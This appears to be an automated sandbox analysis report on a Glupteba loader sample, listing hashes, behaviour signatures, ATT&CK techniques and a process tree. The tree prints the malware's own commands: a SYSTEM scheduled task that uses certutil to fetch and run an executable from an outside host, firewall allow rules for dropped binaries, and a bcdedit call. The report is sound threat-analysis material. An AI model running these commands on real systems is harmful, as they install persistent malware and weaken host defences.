Analysis

  • max time kernel
    144s
  • max time network
    198s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-05-2022 11:53

General

  • Target

    50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf.exe

  • Size

    3.7MB

  • MD5

    0097ebe149e543b37105ee85b39c404e

  • SHA1

    9391f3c380bc3cee42e4d249df328fad1f25fc9d

  • SHA256

    50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf

  • SHA512

    c1fc0651dd2da2a1204e9df3649bb9b8c97dd6f5362c3dd6a1a1ee58906d275c467b19dfea07fd153d76b8b4796cc89e4e42f279424360ffae5941f59caa3d21

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf.exe
    "C:\Users\Admin\AppData\Local\Temp\50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:5012
    • C:\Users\Admin\AppData\Local\Temp\50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf.exe
      "C:\Users\Admin\AppData\Local\Temp\50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:8
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:4260
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5052
        • C:\Windows\rss\csrss.exe
          C:\Windows\rss\csrss.exe ""
          3⤵
          • Executes dropped EXE
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
            4⤵
            • Creates scheduled task(s)
            PID:4092
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:204
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            4⤵
            • Executes dropped EXE
            PID:1776
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\Sysnative\bcdedit.exe /v
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:2400
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4628
    • C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes
      1⤵
        PID:3280

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.7MB

        MD5

        0097ebe149e543b37105ee85b39c404e

        SHA1

        9391f3c380bc3cee42e4d249df328fad1f25fc9d

        SHA256

        50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf

        SHA512

        c1fc0651dd2da2a1204e9df3649bb9b8c97dd6f5362c3dd6a1a1ee58906d275c467b19dfea07fd153d76b8b4796cc89e4e42f279424360ffae5941f59caa3d21

      • C:\Windows\rss\csrss.exe
        Filesize

        3.7MB

        MD5

        0097ebe149e543b37105ee85b39c404e

        SHA1

        9391f3c380bc3cee42e4d249df328fad1f25fc9d

        SHA256

        50fc760b56d7b755ff1a87d5cd11ebd59397cc8c145eb4fd579c76c978d81adf

        SHA512

        c1fc0651dd2da2a1204e9df3649bb9b8c97dd6f5362c3dd6a1a1ee58906d275c467b19dfea07fd153d76b8b4796cc89e4e42f279424360ffae5941f59caa3d21

      • memory/8-134-0x0000000000000000-mapping.dmp
      • memory/204-145-0x0000000000000000-mapping.dmp
      • memory/1776-147-0x0000000000000000-mapping.dmp
      • memory/2400-149-0x0000000000000000-mapping.dmp
      • memory/3280-137-0x0000000000000000-mapping.dmp
      • memory/4092-146-0x0000000000000000-mapping.dmp
      • memory/4260-135-0x0000000000000000-mapping.dmp
      • memory/4572-139-0x0000000000400000-0x0000000001319000-memory.dmp
        Filesize

        15.1MB

      • memory/4572-138-0x00000000016D1000-0x0000000001A7A000-memory.dmp
        Filesize

        3.7MB

      • memory/4572-133-0x0000000000000000-mapping.dmp
      • memory/5008-140-0x0000000000000000-mapping.dmp
      • memory/5008-143-0x0000000001A00000-0x0000000001DA9000-memory.dmp
        Filesize

        3.7MB

      • memory/5008-144-0x0000000000400000-0x0000000001319000-memory.dmp
        Filesize

        15.1MB

      • memory/5012-130-0x0000000001837000-0x0000000001BE0000-memory.dmp
        Filesize

        3.7MB

      • memory/5012-132-0x0000000000400000-0x0000000001319000-memory.dmp
        Filesize

        15.1MB

      • memory/5012-131-0x0000000001BF0000-0x00000000022EC000-memory.dmp
        Filesize

        7.0MB

      • memory/5052-136-0x0000000000000000-mapping.dmp